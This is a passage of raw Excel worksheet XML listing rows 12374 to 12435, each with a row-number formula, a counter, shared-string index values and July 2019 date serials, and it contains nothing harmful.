      </c>
    </row>
    <row r="12374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12374">
        <f t="shared" si="193"/>
        <v>12373</v>
      </c>
      <c r="B12374">
        <v>2373</v>
      </c>
      <c r="C12374" t="s">
        <v>19637</v>
      </c>
      <c r="D12374" s="1">
        <v>43672</v>
      </c>
      <c r="E12374" t="s">
        <v>20767</v>
      </c>
      <c r="F12374" t="s">
        <v>10021</v>
      </c>
      <c r="G12374" t="s">
        <v>22554</v>
      </c>
    </row>
    <row r="12375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12375">
        <f t="shared" si="193"/>
        <v>12374</v>
      </c>
      <c r="B12375">
        <v>2374</v>
      </c>
      <c r="C12375" t="s">
        <v>19637</v>
      </c>
      <c r="D12375" s="1">
        <v>43669</v>
      </c>
      <c r="E12375" t="s">
        <v>21621</v>
      </c>
      <c r="F12375" t="s">
        <v>10526</v>
      </c>
      <c r="G12375" t="s">
        <v>22555</v>
      </c>
    </row>
    <row r="12376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12376">
        <f t="shared" si="193"/>
        <v>12375</v>
      </c>
      <c r="B12376">
        <v>2375</v>
      </c>
      <c r="C12376" t="s">
        <v>19637</v>
      </c>
      <c r="D12376" s="1">
        <v>43674</v>
      </c>
      <c r="F12376" t="s">
        <v>10526</v>
      </c>
      <c r="G12376" t="s">
        <v>22556</v>
      </c>
    </row>
    <row r="12377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12377">
        <f t="shared" si="193"/>
        <v>12376</v>
      </c>
      <c r="B12377">
        <v>2376</v>
      </c>
      <c r="C12377" t="s">
        <v>19637</v>
      </c>
      <c r="D12377" s="1">
        <v>43676</v>
      </c>
      <c r="E12377" t="s">
        <v>22557</v>
      </c>
      <c r="F12377" t="s">
        <v>10526</v>
      </c>
      <c r="G12377" t="s">
        <v>22558</v>
      </c>
    </row>
    <row r="12378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12378">
        <f t="shared" si="193"/>
        <v>12377</v>
      </c>
      <c r="B12378">
        <v>2377</v>
      </c>
      <c r="C12378" t="s">
        <v>19637</v>
      </c>
      <c r="D12378" s="1">
        <v>43674</v>
      </c>
      <c r="E12378" t="s">
        <v>19640</v>
      </c>
      <c r="F12378" t="s">
        <v>10526</v>
      </c>
      <c r="G12378" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="12379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12379">
        <f t="shared" si="193"/>
        <v>12378</v>
      </c>
      <c r="B12379">
        <v>2378</v>
      </c>
      <c r="C12379" t="s">
        <v>19637</v>
      </c>
      <c r="D12379" s="1">
        <v>43671</v>
      </c>
      <c r="E12379" t="s">
        <v>19640</v>
      </c>
      <c r="F12379" t="s">
        <v>9975</v>
      </c>
      <c r="G12379" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="12380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12380">
        <f t="shared" si="193"/>
        <v>12379</v>
      </c>
      <c r="B12380">
        <v>2379</v>
      </c>
      <c r="C12380" t="s">
        <v>19637</v>
      </c>
      <c r="D12380" s="1">
        <v>43668</v>
      </c>
      <c r="E12380" t="s">
        <v>19796</v>
      </c>
      <c r="F12380" t="s">
        <v>10021</v>
      </c>
      <c r="G12380" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="12381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12381">
        <f t="shared" si="193"/>
        <v>12380</v>
      </c>
      <c r="B12381">
        <v>2380</v>
      </c>
      <c r="C12381" t="s">
        <v>19637</v>
      </c>
      <c r="D12381" s="1">
        <v>43671</v>
      </c>
      <c r="E12381" t="s">
        <v>21389</v>
      </c>
      <c r="F12381" t="s">
        <v>9975</v>
      </c>
      <c r="G12381" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="12382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12382">
        <f t="shared" si="193"/>
        <v>12381</v>
      </c>
      <c r="B12382">
        <v>2381</v>
      </c>
      <c r="C12382" t="s">
        <v>19637</v>
      </c>
      <c r="D12382" s="1">
        <v>43674</v>
      </c>
      <c r="E12382" t="s">
        <v>19640</v>
      </c>
      <c r="F12382" t="s">
        <v>9975</v>
      </c>
      <c r="G12382" t="s">
        <v>22563</v>
      </c>
    </row>
    <row r="12383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12383">
        <f t="shared" si="193"/>
        <v>12382</v>
      </c>
      <c r="B12383">
        <v>2382</v>
      </c>
      <c r="C12383" t="s">
        <v>19637</v>
      </c>
      <c r="D12383" s="1">
        <v>43673</v>
      </c>
      <c r="F12383" t="s">
        <v>10526</v>
      </c>
      <c r="G12383" t="s">
        <v>22564</v>
      </c>
    </row>
    <row r="12384" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12384">
        <f t="shared" si="193"/>
        <v>12383</v>
      </c>
      <c r="B12384">
        <v>2383</v>
      </c>
      <c r="C12384" t="s">
        <v>19637</v>
      </c>
      <c r="D12384" s="1">
        <v>43674</v>
      </c>
      <c r="E12384" t="s">
        <v>19690</v>
      </c>
      <c r="F12384" t="s">
        <v>9978</v>
      </c>
      <c r="G12384" t="s">
        <v>22565</v>
      </c>
    </row>
    <row r="12385" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12385">
        <f t="shared" si="193"/>
        <v>12384</v>
      </c>
      <c r="B12385">
        <v>2384</v>
      </c>
      <c r="C12385" t="s">
        <v>19637</v>
      </c>
      <c r="D12385" s="1">
        <v>43669</v>
      </c>
      <c r="E12385" t="s">
        <v>19640</v>
      </c>
      <c r="F12385" t="s">
        <v>10021</v>
      </c>
      <c r="G12385" t="s">
        <v>22566</v>
      </c>
    </row>
    <row r="12386" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12386">
        <f t="shared" si="193"/>
        <v>12385</v>
      </c>
      <c r="B12386">
        <v>2385</v>
      </c>
      <c r="C12386" t="s">
        <v>19637</v>
      </c>
      <c r="D12386" s="1">
        <v>43675</v>
      </c>
      <c r="F12386" t="s">
        <v>10021</v>
      </c>
      <c r="G12386" t="s">
        <v>22567</v>
      </c>
    </row>
    <row r="12387" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12387">
        <f t="shared" si="193"/>
        <v>12386</v>
      </c>
      <c r="B12387">
        <v>2386</v>
      </c>
      <c r="C12387" t="s">
        <v>19637</v>
      </c>
      <c r="D12387" s="1">
        <v>43674</v>
      </c>
      <c r="E12387" t="s">
        <v>19917</v>
      </c>
      <c r="F12387" t="s">
        <v>9975</v>
      </c>
      <c r="G12387" t="s">
        <v>22568</v>
      </c>
    </row>
    <row r="12388" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12388">
        <f t="shared" si="193"/>
        <v>12387</v>
      </c>
      <c r="B12388">
        <v>2387</v>
      </c>
      <c r="C12388" t="s">
        <v>19637</v>
      </c>
      <c r="D12388" s="1">
        <v>43677</v>
      </c>
      <c r="F12388" t="s">
        <v>10526</v>
      </c>
      <c r="G12388" t="s">
        <v>22569</v>
      </c>
    </row>
    <row r="12389" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12389">
        <f t="shared" si="193"/>
        <v>12388</v>
      </c>
      <c r="B12389">
        <v>2388</v>
      </c>
      <c r="C12389" t="s">
        <v>19637</v>
      </c>
      <c r="D12389" s="1">
        <v>43670</v>
      </c>
      <c r="E12389" t="s">
        <v>22570</v>
      </c>
      <c r="F12389" t="s">
        <v>9978</v>
      </c>
      <c r="G12389" t="s">
        <v>22571</v>
      </c>
    </row>
    <row r="12390" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12390">
        <f t="shared" si="193"/>
        <v>12389</v>
      </c>
      <c r="B12390">
        <v>2389</v>
      </c>
      <c r="C12390" t="s">
        <v>19637</v>
      </c>
      <c r="D12390" s="1">
        <v>43672</v>
      </c>
      <c r="E12390" t="s">
        <v>22572</v>
      </c>
      <c r="F12390" t="s">
        <v>10526</v>
      </c>
      <c r="G12390" t="s">
        <v>22573</v>
      </c>
    </row>
    <row r="12391" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12391">
        <f t="shared" si="193"/>
        <v>12390</v>
      </c>
      <c r="B12391">
        <v>2390</v>
      </c>
      <c r="C12391" t="s">
        <v>19637</v>
      </c>
      <c r="D12391" s="1">
        <v>43675</v>
      </c>
      <c r="E12391" t="s">
        <v>19650</v>
      </c>
      <c r="F12391" t="s">
        <v>10021</v>
      </c>
      <c r="G12391" t="s">
        <v>22574</v>
      </c>
    </row>
    <row r="12392" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12392">
        <f t="shared" si="193"/>
        <v>12391</v>
      </c>
      <c r="B12392">
        <v>2391</v>
      </c>
      <c r="C12392" t="s">
        <v>19637</v>
      </c>
      <c r="D12392" s="1">
        <v>43673</v>
      </c>
      <c r="E12392" t="s">
        <v>19690</v>
      </c>
      <c r="F12392" t="s">
        <v>9978</v>
      </c>
      <c r="G12392" t="s">
        <v>22575</v>
      </c>
    </row>
    <row r="12393" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12393">
        <f t="shared" si="193"/>
        <v>12392</v>
      </c>
      <c r="B12393">
        <v>2392</v>
      </c>
      <c r="C12393" t="s">
        <v>19637</v>
      </c>
      <c r="D12393" s="1">
        <v>43669</v>
      </c>
      <c r="E12393" t="s">
        <v>19796</v>
      </c>
      <c r="F12393" t="s">
        <v>10021</v>
      </c>
      <c r="G12393" t="s">
        <v>22576</v>
      </c>
    </row>
    <row r="12394" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12394">
        <f t="shared" si="193"/>
        <v>12393</v>
      </c>
      <c r="B12394">
        <v>2393</v>
      </c>
      <c r="C12394" t="s">
        <v>19637</v>
      </c>
      <c r="D12394" s="1">
        <v>43668</v>
      </c>
      <c r="E12394" t="s">
        <v>19640</v>
      </c>
      <c r="F12394" t="s">
        <v>9975</v>
      </c>
      <c r="G12394" t="s">
        <v>22577</v>
      </c>
    </row>
    <row r="12395" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12395">
        <f t="shared" si="193"/>
        <v>12394</v>
      </c>
      <c r="B12395">
        <v>2394</v>
      </c>
      <c r="C12395" t="s">
        <v>19637</v>
      </c>
      <c r="D12395" s="1">
        <v>43676</v>
      </c>
      <c r="E12395" t="s">
        <v>22578</v>
      </c>
      <c r="F12395" t="s">
        <v>10526</v>
      </c>
      <c r="G12395" t="s">
        <v>22579</v>
      </c>
    </row>
    <row r="12396" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12396">
        <f t="shared" si="193"/>
        <v>12395</v>
      </c>
      <c r="B12396">
        <v>2395</v>
      </c>
      <c r="C12396" t="s">
        <v>19637</v>
      </c>
      <c r="D12396" s="1">
        <v>43673</v>
      </c>
      <c r="E12396" t="s">
        <v>19701</v>
      </c>
      <c r="F12396" t="s">
        <v>10021</v>
      </c>
      <c r="G12396" t="s">
        <v>22580</v>
      </c>
    </row>
    <row r="12397" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12397">
        <f t="shared" si="193"/>
        <v>12396</v>
      </c>
      <c r="B12397">
        <v>2396</v>
      </c>
      <c r="C12397" t="s">
        <v>19637</v>
      </c>
      <c r="D12397" s="1">
        <v>43670</v>
      </c>
      <c r="E12397" t="s">
        <v>19725</v>
      </c>
      <c r="F12397" t="s">
        <v>9978</v>
      </c>
      <c r="G12397" t="s">
        <v>22581</v>
      </c>
    </row>
    <row r="12398" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12398">
        <f t="shared" si="193"/>
        <v>12397</v>
      </c>
      <c r="B12398">
        <v>2397</v>
      </c>
      <c r="C12398" t="s">
        <v>19637</v>
      </c>
      <c r="D12398" s="1">
        <v>43676</v>
      </c>
      <c r="E12398" t="s">
        <v>22582</v>
      </c>
      <c r="F12398" t="s">
        <v>10526</v>
      </c>
      <c r="G12398" t="s">
        <v>22583</v>
      </c>
    </row>
    <row r="12399" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12399">
        <f t="shared" si="193"/>
        <v>12398</v>
      </c>
      <c r="B12399">
        <v>2398</v>
      </c>
      <c r="C12399" t="s">
        <v>19637</v>
      </c>
      <c r="D12399" s="1">
        <v>43677</v>
      </c>
      <c r="E12399" t="s">
        <v>19640</v>
      </c>
      <c r="F12399" t="s">
        <v>9975</v>
      </c>
      <c r="G12399" t="s">
        <v>22584</v>
      </c>
    </row>
    <row r="12400" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12400">
        <f t="shared" si="193"/>
        <v>12399</v>
      </c>
      <c r="B12400">
        <v>2399</v>
      </c>
      <c r="C12400" t="s">
        <v>19637</v>
      </c>
      <c r="D12400" s="1">
        <v>43676</v>
      </c>
      <c r="E12400" t="s">
        <v>22585</v>
      </c>
      <c r="F12400" t="s">
        <v>10526</v>
      </c>
      <c r="G12400" t="s">
        <v>22586</v>
      </c>
    </row>
    <row r="12401" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12401">
        <f t="shared" si="193"/>
        <v>12400</v>
      </c>
      <c r="B12401">
        <v>2400</v>
      </c>
      <c r="C12401" t="s">
        <v>19637</v>
      </c>
      <c r="D12401" s="1">
        <v>43669</v>
      </c>
      <c r="E12401" t="s">
        <v>19638</v>
      </c>
      <c r="F12401" t="s">
        <v>10021</v>
      </c>
      <c r="G12401" t="s">
        <v>22587</v>
      </c>
    </row>
    <row r="12402" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12402">
        <f t="shared" si="193"/>
        <v>12401</v>
      </c>
      <c r="B12402">
        <v>2401</v>
      </c>
      <c r="C12402" t="s">
        <v>19637</v>
      </c>
      <c r="D12402" s="1">
        <v>43677</v>
      </c>
      <c r="E12402" t="s">
        <v>19640</v>
      </c>
      <c r="F12402" t="s">
        <v>9975</v>
      </c>
      <c r="G12402" t="s">
        <v>22588</v>
      </c>
    </row>
    <row r="12403" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12403">
        <f t="shared" si="193"/>
        <v>12402</v>
      </c>
      <c r="B12403">
        <v>2402</v>
      </c>
      <c r="C12403" t="s">
        <v>19637</v>
      </c>
      <c r="D12403" s="1">
        <v>43677</v>
      </c>
      <c r="E12403" t="s">
        <v>19687</v>
      </c>
      <c r="F12403" t="s">
        <v>10021</v>
      </c>
      <c r="G12403" t="s">
        <v>22589</v>
      </c>
    </row>
    <row r="12404" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12404">
        <f t="shared" si="193"/>
        <v>12403</v>
      </c>
      <c r="B12404">
        <v>2403</v>
      </c>
      <c r="C12404" t="s">
        <v>19637</v>
      </c>
      <c r="D12404" s="1">
        <v>43672</v>
      </c>
      <c r="E12404" t="s">
        <v>19776</v>
      </c>
      <c r="F12404" t="s">
        <v>10021</v>
      </c>
      <c r="G12404" t="s">
        <v>22590</v>
      </c>
    </row>
    <row r="12405" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12405">
        <f t="shared" si="193"/>
        <v>12404</v>
      </c>
      <c r="B12405">
        <v>2404</v>
      </c>
      <c r="C12405" t="s">
        <v>19637</v>
      </c>
      <c r="D12405" s="1">
        <v>43676</v>
      </c>
      <c r="E12405" t="s">
        <v>20985</v>
      </c>
      <c r="F12405" t="s">
        <v>10526</v>
      </c>
      <c r="G12405" t="s">
        <v>22591</v>
      </c>
    </row>
    <row r="12406" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12406">
        <f t="shared" si="193"/>
        <v>12405</v>
      </c>
      <c r="B12406">
        <v>2405</v>
      </c>
      <c r="C12406" t="s">
        <v>19637</v>
      </c>
      <c r="D12406" s="1">
        <v>43670</v>
      </c>
      <c r="E12406" t="s">
        <v>19640</v>
      </c>
      <c r="F12406" t="s">
        <v>10021</v>
      </c>
      <c r="G12406" t="s">
        <v>22592</v>
      </c>
    </row>
    <row r="12407" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12407">
        <f t="shared" si="193"/>
        <v>12406</v>
      </c>
      <c r="B12407">
        <v>2406</v>
      </c>
      <c r="C12407" t="s">
        <v>19637</v>
      </c>
      <c r="D12407" s="1">
        <v>43670</v>
      </c>
      <c r="E12407" t="s">
        <v>20464</v>
      </c>
      <c r="F12407" t="s">
        <v>10526</v>
      </c>
      <c r="G12407" t="s">
        <v>22593</v>
      </c>
    </row>
    <row r="12408" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12408">
        <f t="shared" si="193"/>
        <v>12407</v>
      </c>
      <c r="B12408">
        <v>2407</v>
      </c>
      <c r="C12408" t="s">
        <v>19637</v>
      </c>
      <c r="D12408" s="1">
        <v>43669</v>
      </c>
      <c r="E12408" t="s">
        <v>19695</v>
      </c>
      <c r="F12408" t="s">
        <v>9975</v>
      </c>
      <c r="G12408" t="s">
        <v>22594</v>
      </c>
    </row>
    <row r="12409" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12409">
        <f t="shared" si="193"/>
        <v>12408</v>
      </c>
      <c r="B12409">
        <v>2408</v>
      </c>
      <c r="C12409" t="s">
        <v>19637</v>
      </c>
      <c r="D12409" s="1">
        <v>43675</v>
      </c>
      <c r="E12409" t="s">
        <v>20182</v>
      </c>
      <c r="F12409" t="s">
        <v>10021</v>
      </c>
      <c r="G12409" t="s">
        <v>22595</v>
      </c>
    </row>
    <row r="12410" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12410">
        <f t="shared" si="193"/>
        <v>12409</v>
      </c>
      <c r="B12410">
        <v>2409</v>
      </c>
      <c r="C12410" t="s">
        <v>19637</v>
      </c>
      <c r="D12410" s="1">
        <v>43669</v>
      </c>
      <c r="E12410" t="s">
        <v>21741</v>
      </c>
      <c r="F12410" t="s">
        <v>9978</v>
      </c>
      <c r="G12410" t="s">
        <v>22596</v>
      </c>
    </row>
    <row r="12411" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12411">
        <f t="shared" si="193"/>
        <v>12410</v>
      </c>
      <c r="B12411">
        <v>2410</v>
      </c>
      <c r="C12411" t="s">
        <v>19637</v>
      </c>
      <c r="D12411" s="1">
        <v>43668</v>
      </c>
      <c r="E12411" t="s">
        <v>19879</v>
      </c>
      <c r="F12411" t="s">
        <v>10021</v>
      </c>
      <c r="G12411" t="s">
        <v>22597</v>
      </c>
    </row>
    <row r="12412" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12412">
        <f t="shared" si="193"/>
        <v>12411</v>
      </c>
      <c r="B12412">
        <v>2411</v>
      </c>
      <c r="C12412" t="s">
        <v>19637</v>
      </c>
      <c r="D12412" s="1">
        <v>43669</v>
      </c>
      <c r="E12412" t="s">
        <v>19840</v>
      </c>
      <c r="F12412" t="s">
        <v>10021</v>
      </c>
      <c r="G12412" t="s">
        <v>22598</v>
      </c>
    </row>
    <row r="12413" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12413">
        <f t="shared" si="193"/>
        <v>12412</v>
      </c>
      <c r="B12413">
        <v>2412</v>
      </c>
      <c r="C12413" t="s">
        <v>19637</v>
      </c>
      <c r="D12413" s="1">
        <v>43673</v>
      </c>
      <c r="E12413" t="s">
        <v>19715</v>
      </c>
      <c r="F12413" t="s">
        <v>10021</v>
      </c>
      <c r="G12413" t="s">
        <v>22599</v>
      </c>
    </row>
    <row r="12414" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12414">
        <f t="shared" si="193"/>
        <v>12413</v>
      </c>
      <c r="B12414">
        <v>2413</v>
      </c>
      <c r="C12414" t="s">
        <v>19637</v>
      </c>
      <c r="D12414" s="1">
        <v>43670</v>
      </c>
      <c r="E12414" t="s">
        <v>22600</v>
      </c>
      <c r="F12414" t="s">
        <v>10526</v>
      </c>
      <c r="G12414" t="s">
        <v>22601</v>
      </c>
    </row>
    <row r="12415" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12415">
        <f t="shared" si="193"/>
        <v>12414</v>
      </c>
      <c r="B12415">
        <v>2414</v>
      </c>
      <c r="C12415" t="s">
        <v>19637</v>
      </c>
      <c r="D12415" s="1">
        <v>43670</v>
      </c>
      <c r="E12415" t="s">
        <v>20185</v>
      </c>
      <c r="F12415" t="s">
        <v>9975</v>
      </c>
      <c r="G12415" t="s">
        <v>22602</v>
      </c>
    </row>
    <row r="12416" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12416">
        <f t="shared" si="193"/>
        <v>12415</v>
      </c>
      <c r="B12416">
        <v>2415</v>
      </c>
      <c r="C12416" t="s">
        <v>19637</v>
      </c>
      <c r="D12416" s="1">
        <v>43677</v>
      </c>
      <c r="E12416" t="s">
        <v>19640</v>
      </c>
      <c r="F12416" t="s">
        <v>9975</v>
      </c>
      <c r="G12416" t="s">
        <v>22603</v>
      </c>
    </row>
    <row r="12417" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12417">
        <f t="shared" si="193"/>
        <v>12416</v>
      </c>
      <c r="B12417">
        <v>2416</v>
      </c>
      <c r="C12417" t="s">
        <v>19637</v>
      </c>
      <c r="D12417" s="1">
        <v>43669</v>
      </c>
      <c r="F12417" t="s">
        <v>10526</v>
      </c>
      <c r="G12417" t="s">
        <v>22604</v>
      </c>
    </row>
    <row r="12418" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12418">
        <f t="shared" si="193"/>
        <v>12417</v>
      </c>
      <c r="B12418">
        <v>2417</v>
      </c>
      <c r="C12418" t="s">
        <v>19637</v>
      </c>
      <c r="D12418" s="1">
        <v>43672</v>
      </c>
      <c r="E12418" t="s">
        <v>20324</v>
      </c>
      <c r="F12418" t="s">
        <v>10526</v>
      </c>
      <c r="G12418" t="s">
        <v>22605</v>
      </c>
    </row>
    <row r="12419" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12419">
        <f t="shared" ref="A12419:A12482" si="194">+ROW(A12418)</f>
        <v>12418</v>
      </c>
      <c r="B12419">
        <v>2418</v>
      </c>
      <c r="C12419" t="s">
        <v>19637</v>
      </c>
      <c r="D12419" s="1">
        <v>43674</v>
      </c>
      <c r="E12419" t="s">
        <v>19705</v>
      </c>
      <c r="F12419" t="s">
        <v>10021</v>
      </c>
      <c r="G12419" t="s">
        <v>22606</v>
      </c>
    </row>
    <row r="12420" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12420">
        <f t="shared" si="194"/>
        <v>12419</v>
      </c>
      <c r="B12420">
        <v>2419</v>
      </c>
      <c r="C12420" t="s">
        <v>19637</v>
      </c>
      <c r="D12420" s="1">
        <v>43668</v>
      </c>
      <c r="E12420" t="s">
        <v>19709</v>
      </c>
      <c r="F12420" t="s">
        <v>10526</v>
      </c>
      <c r="G12420" t="s">
        <v>22607</v>
      </c>
    </row>
    <row r="12421" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12421">
        <f t="shared" si="194"/>
        <v>12420</v>
      </c>
      <c r="B12421">
        <v>2420</v>
      </c>
      <c r="C12421" t="s">
        <v>19637</v>
      </c>
      <c r="D12421" s="1">
        <v>43670</v>
      </c>
      <c r="E12421" t="s">
        <v>19640</v>
      </c>
      <c r="F12421" t="s">
        <v>10021</v>
      </c>
      <c r="G12421" t="s">
        <v>22608</v>
      </c>
    </row>
    <row r="12422" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12422">
        <f t="shared" si="194"/>
        <v>12421</v>
      </c>
      <c r="B12422">
        <v>2421</v>
      </c>
      <c r="C12422" t="s">
        <v>19637</v>
      </c>
      <c r="D12422" s="1">
        <v>43672</v>
      </c>
      <c r="E12422" t="s">
        <v>19725</v>
      </c>
      <c r="F12422" t="s">
        <v>9978</v>
      </c>
      <c r="G12422" t="s">
        <v>22609</v>
      </c>
    </row>
    <row r="12423" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12423">
        <f t="shared" si="194"/>
        <v>12422</v>
      </c>
      <c r="B12423">
        <v>2422</v>
      </c>
      <c r="C12423" t="s">
        <v>19637</v>
      </c>
      <c r="D12423" s="1">
        <v>43674</v>
      </c>
      <c r="E12423" t="s">
        <v>19640</v>
      </c>
      <c r="F12423" t="s">
        <v>9975</v>
      </c>
      <c r="G12423" t="s">
        <v>22610</v>
      </c>
    </row>
    <row r="12424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12424">
        <f t="shared" si="194"/>
        <v>12423</v>
      </c>
      <c r="B12424">
        <v>2423</v>
      </c>
      <c r="C12424" t="s">
        <v>19637</v>
      </c>
      <c r="D12424" s="1">
        <v>43671</v>
      </c>
      <c r="F12424" t="s">
        <v>10526</v>
      </c>
      <c r="G12424" t="s">
        <v>22611</v>
      </c>
    </row>
    <row r="12425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12425">
        <f t="shared" si="194"/>
        <v>12424</v>
      </c>
      <c r="B12425">
        <v>2424</v>
      </c>
      <c r="C12425" t="s">
        <v>19637</v>
      </c>
      <c r="D12425" s="1">
        <v>43670</v>
      </c>
      <c r="E12425" t="s">
        <v>19796</v>
      </c>
      <c r="F12425" t="s">
        <v>10021</v>
      </c>
      <c r="G12425" t="s">
        <v>22612</v>
      </c>
    </row>
    <row r="12426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12426">
        <f t="shared" si="194"/>
        <v>12425</v>
      </c>
      <c r="B12426">
        <v>2425</v>
      </c>
      <c r="C12426" t="s">
        <v>19637</v>
      </c>
      <c r="D12426" s="1">
        <v>43675</v>
      </c>
      <c r="E12426" t="s">
        <v>19785</v>
      </c>
      <c r="F12426" t="s">
        <v>9975</v>
      </c>
      <c r="G12426" t="s">
        <v>22613</v>
      </c>
    </row>
    <row r="12427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12427">
        <f t="shared" si="194"/>
        <v>12426</v>
      </c>
      <c r="B12427">
        <v>2426</v>
      </c>
      <c r="C12427" t="s">
        <v>19637</v>
      </c>
      <c r="D12427" s="1">
        <v>43674</v>
      </c>
      <c r="E12427" t="s">
        <v>19750</v>
      </c>
      <c r="F12427" t="s">
        <v>9978</v>
      </c>
      <c r="G12427" t="s">
        <v>22614</v>
      </c>
    </row>
    <row r="12428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12428">
        <f t="shared" si="194"/>
        <v>12427</v>
      </c>
      <c r="B12428">
        <v>2427</v>
      </c>
      <c r="C12428" t="s">
        <v>19637</v>
      </c>
      <c r="D12428" s="1">
        <v>43675</v>
      </c>
      <c r="E12428" t="s">
        <v>22615</v>
      </c>
      <c r="F12428" t="s">
        <v>10526</v>
      </c>
      <c r="G12428" t="s">
        <v>22616</v>
      </c>
    </row>
    <row r="12429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12429">
        <f t="shared" si="194"/>
        <v>12428</v>
      </c>
      <c r="B12429">
        <v>2428</v>
      </c>
      <c r="C12429" t="s">
        <v>19637</v>
      </c>
      <c r="D12429" s="1">
        <v>43674</v>
      </c>
      <c r="E12429" t="s">
        <v>22617</v>
      </c>
      <c r="F12429" t="s">
        <v>10526</v>
      </c>
      <c r="G12429" t="s">
        <v>22618</v>
      </c>
    </row>
    <row r="12430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12430">
        <f t="shared" si="194"/>
        <v>12429</v>
      </c>
      <c r="B12430">
        <v>2429</v>
      </c>
      <c r="C12430" t="s">
        <v>19637</v>
      </c>
      <c r="D12430" s="1">
        <v>43676</v>
      </c>
      <c r="E12430" t="s">
        <v>22619</v>
      </c>
      <c r="F12430" t="s">
        <v>9975</v>
      </c>
      <c r="G12430" t="s">
        <v>22620</v>
      </c>
    </row>
    <row r="12431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12431">
        <f t="shared" si="194"/>
        <v>12430</v>
      </c>
      <c r="B12431">
        <v>2430</v>
      </c>
      <c r="C12431" t="s">
        <v>19637</v>
      </c>
      <c r="D12431" s="1">
        <v>43671</v>
      </c>
      <c r="E12431" t="s">
        <v>22621</v>
      </c>
      <c r="F12431" t="s">
        <v>10526</v>
      </c>
      <c r="G12431" t="s">
        <v>22622</v>
      </c>
    </row>
    <row r="12432" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12432">
        <f t="shared" si="194"/>
        <v>12431</v>
      </c>
      <c r="B12432">
        <v>2431</v>
      </c>
      <c r="C12432" t="s">
        <v>19637</v>
      </c>
      <c r="D12432" s="1">
        <v>43670</v>
      </c>
      <c r="E12432" t="s">
        <v>21785</v>
      </c>
      <c r="F12432" t="s">
        <v>10021</v>
      </c>
      <c r="G12432" t="s">
        <v>22623</v>
      </c>
    </row>
    <row r="12433" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12433">
        <f t="shared" si="194"/>
        <v>12432</v>
      </c>
      <c r="B12433">
        <v>2432</v>
      </c>
      <c r="C12433" t="s">
        <v>19637</v>
      </c>
      <c r="D12433" s="1">
        <v>43670</v>
      </c>
      <c r="E12433" t="s">
        <v>19750</v>
      </c>
      <c r="F12433" t="s">
        <v>9978</v>
      </c>
      <c r="G12433" t="s">
        <v>22624</v>
      </c>
    </row>
    <row r="12434" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12434">
        <f t="shared" si="194"/>
        <v>12433</v>
      </c>
      <c r="B12434">
        <v>2433</v>
      </c>
      <c r="C12434" t="s">
        <v>19637</v>
      </c>
      <c r="D12434" s="1">
        <v>43677</v>
      </c>
      <c r="E12434" t="s">
        <v>20349</v>
      </c>
      <c r="F12434" t="s">
        <v>9978</v>
      </c>
      <c r="G12434" t="s">
        <v>22625</v>
      </c>
    </row>
    <row r="12435" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12435">
        <f t="shared" si="194"/>
        <v>12434</v>
      </c>
      <c r="B12435">
        <v>2434</v>
      </c>
      <c r="C12435" t="s">
        <v>19637</v>
      </c>
